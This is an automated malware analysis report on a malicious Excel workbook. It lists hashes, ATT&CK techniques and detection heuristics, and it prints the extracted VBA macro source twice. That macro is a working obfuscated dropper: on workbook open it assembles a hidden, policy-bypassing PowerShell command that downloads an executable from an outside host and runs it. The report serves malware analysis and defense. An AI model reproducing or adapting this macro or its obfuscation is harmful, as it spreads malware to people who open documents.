Xls.Dropper.Generic-6595971-0 Office (OLE) malware analysis — malicious · a67f1f172d846bb7

MALICIOUS

Office (OLE)

38.0 KB Created: 2017-10-19 07:59:05 Authoring application: Microsoft Excel First seen: 2019-01-25

MD5: 147590aa93ff42e4bda03d4745d165b9 SHA-1: 6ff898bafe41969119fc0fcacfd09aca69d66c1d SHA-256: a67f1f172d846bb7b2e82d2d9d423d0fe12292f2eb4c04e5341acffaa74c800c

240 Risk Score

Malware Insights

Xls.Dropper.Generic-6595971-0 · confidence 95%

MITRE ATT&CK

T1059.001 PowerShell T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file contains VBA macros, including a Workbook_Open event, which is a common technique for executing malicious code upon opening an Excel document. The macro uses obfuscated string concatenation to construct and execute a PowerShell command. This command is designed to download and execute a second-stage payload, as indicated by the critical heuristic firings for Shell() calls and split keyword obfuscation for 'PowerShell'.

Heuristics 5

ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2754 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2754 bytes
SHA-256: `e29ba7768fe745cd4fdb47b55844c244e99a2bb436962bd06eb698c7ed141fd3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Function mmetalo() mmetalo = "V" + "I" + "r'" + ",'N" End Function Function litercal() tellaboutme = "}\"" -" + "f '" + "on'" goovers = mmetalo + "t'," + "'m" + "E') ; " litercal = "$7" + "d" + "0m" + "K6 = [" + mortalcc + "}{2" + tellaboutme + ",'eN" + goovers End Function Function mortalcc() lomadus = "p" + "e]" mortalcc = "Ty" + lomadus + "(\""{" + "1}{0" + "}{3" End Function Function asdefas() togaclose = "{D`e" + "s} = $7d" asdefas = "d" + "o{&(\""{1}" + "{0}\"" -f'ep','" + "sle'" + ") 31;$" + togaclose End Function Function fostport() fostport = "(\""{" + "0}" + "{2}{" + "1}{3}{" + "5}{6}" + "{4}\""" + "-f'" + "S" + "y','t" + "e','s" + "','m" End Function Function dellcomp() dellcomp = "OaDfiLE.IN" End Function Function enteresdum() enteresdum = "CM" + "d /c""" + " PoWe" + "rSHeLL -N" + "oloGO -E" + "XecUt" + "IONPO B" + "yPass -W" + "InDOw hi" + "DdEN -n" + "OPrOfI" + "L -N" + "oniNTER """ End Function Function faxadnphone() faxadnphone = "sktop" End Function Function tramasbus() tramasbus = "wh" + "ile(" + "!${" + "?});&" + "(\""{" + amaduespp + "t'," + "'o" + "ce" + dockstations + "e" + "s" + "\" End Function Function amaduespp() amaduespp = "0}{2}" + "{3}{1}\""-" + "f" + " 'S" End Function Sub Workbook_Open() bloodred = "p" If certdetThumbprint > 1.1 Then Dim hesterff As String Randomize hesterff = Int(Rnd * 9882761#) easwertyu = hesterff qwertyf = fostport + ".Ne','enT','t.WeB','ClI')).dOwNL" + dellcomp + "VokE(\""ht" + "t" + "p:/" + "/ravigel.com/tvs1.dat\"",\""$" + "Des\" + easwertyu + ".e" + "xe\"")}" mitsubis = asdefas + "0mk" + "6::gE" + pirelliwheel + "TH(\""De" + faxadnphone + "\"")" + ";(&(" + "\""{0}{1" + "}{2}\""" + " -f'N" + "e','w-" + "','O" + "bj" + "ect') " ugaunus = tramasbus + easwertyu + ".ex" + "e""" gaeedom = enteresdum + litercal + mitsubis + qwertyf + ugaunus + """" Shell gaeedom, RibbonControlSizeRegular End If End Sub Function pirelliwheel() pirelliwheel = "tFo" + "Ld" + "eR" + "Pa" End Function Function dockstations() dockstations = "s" + "s'," + "'ar" + "t'," + "'-" + "Pr')" + " $D" End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: e29ba7768fe745cd4fdb47b55844c244e99a2bb436962bd06eb698c7ed141fd3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function mmetalo()
mmetalo = "V" + "I" + "r'" + ",'N"
End Function
Function litercal()
tellaboutme = "}\"" -" + "f '" + "on'"
goovers = mmetalo + "t'," + "'m" + "E') ;  "
litercal = "$7" + "d" + "0m" + "K6 = [" + mortalcc + "}{2" + tellaboutme + ",'eN" + goovers
End Function
Function mortalcc()
lomadus = "p" + "e]"
mortalcc = "Ty" + lomadus + "(\""{" + "1}{0" + "}{3"
End Function
Function asdefas()
togaclose = "{D`e" + "s} =  $7d"
asdefas = "d" + "o{&(\""{1}" + "{0}\"" -f'ep','" + "sle'" + ") 31;$" + togaclose
End Function
Function fostport()
fostport = "(\""{" + "0}" + "{2}{" + "1}{3}{" + "5}{6}" + "{4}\""" + "-f'" + "S" + "y','t" + "e','s" + "','m"
End Function
Function dellcomp()
dellcomp = "OaDfiLE.IN"
End Function
Function enteresdum()
enteresdum = "CM" + "d       /c""" + "       PoWe" + "rSHeLL  -N" + "oloGO -E" + "XecUt" + "IONPO B" + "yPass -W" + "InDOw  hi" + "DdEN  -n" + "OPrOfI" + "L -N" + "oniNTER """
End Function
Function faxadnphone()
faxadnphone = "sktop"
End Function

Function tramasbus()
tramasbus = "wh" + "ile(" + "!${" + "?});&" + "(\""{" + amaduespp + "t'," + "'o" + "ce" + dockstations + "e" + "s" + "\"
End Function
Function amaduespp()
amaduespp = "0}{2}" + "{3}{1}\""-" + "f" + " 'S"
End Function


Sub Workbook_Open()
bloodred = "p"
If certdetThumbprint > 1.1 Then
Dim hesterff As String
Randomize
hesterff = Int(Rnd * 9882761#)
easwertyu = hesterff
qwertyf = fostport + ".Ne','enT','t.WeB','ClI')).dOwNL" + dellcomp + "VokE(\""ht" + "t" + "p:/" + "/ravigel.com/tvs1.dat\"",\""$" + "Des\" + easwertyu + ".e" + "xe\"")}"
mitsubis = asdefas + "0mk" + "6::gE" + pirelliwheel + "TH(\""De" + faxadnphone + "\"")" + ";(&(" + "\""{0}{1" + "}{2}\""" + " -f'N" + "e','w-" + "','O" + "bj" + "ect') "
ugaunus = tramasbus + easwertyu + ".ex" + "e"""
gaeedom = enteresdum + litercal + mitsubis + qwertyf + ugaunus + """"
Shell gaeedom, RibbonControlSizeRegular
End If
End Sub
Function pirelliwheel()
pirelliwheel = "tFo" + "Ld" + "eR" + "Pa"
End Function
Function dockstations()
dockstations = "s" + "s'," + "'ar" + "t'," + "'-" + "Pr')" + " $D"
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.